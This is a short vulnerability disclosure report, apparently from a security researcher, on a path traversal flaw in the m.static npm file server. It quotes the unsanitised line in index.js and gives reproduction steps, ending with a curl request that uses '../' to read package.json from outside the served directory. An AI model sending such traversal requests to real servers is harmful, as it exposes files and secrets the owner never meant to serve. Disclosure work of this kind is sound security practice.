m.static
descibres itself as: m(icro)static is a lightweight static file server for node.js written in es6+
.
Observation:
- Virtually zero downloads, so no considerable impact.
- It was last published 4 years ago.
Resources:
- Project's GitHub source code: https://github.com/ivoputzer/m.static/
- Project's npm package: https://www.npmjs.com/package/m.static
This file server library is vulnerable to Path Traversal attacks due to no input sanitization or other checks and protections employed to the path being requested:
Line 19 of index.js
:
const requestFile = join(options.cwd, req.url)
This vulnerability should probably be classified as a CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal').
- Install the latest version of
m.static
(npm install --save m.static@2.2.0
) - Make sure you have a
public/
directory with files in it - Run the server
npx m.static --port 3000 --cwd public/
- Send a request for files outside the static directory and confirm it is successful to employ a path traversal attack:
curl --path-as-is "http://localhost:3000/../package.json
and observe the contents of the file returned back in the response
.
├── public
│ └── index.html
|── server.js
└── package.json
Liran Tal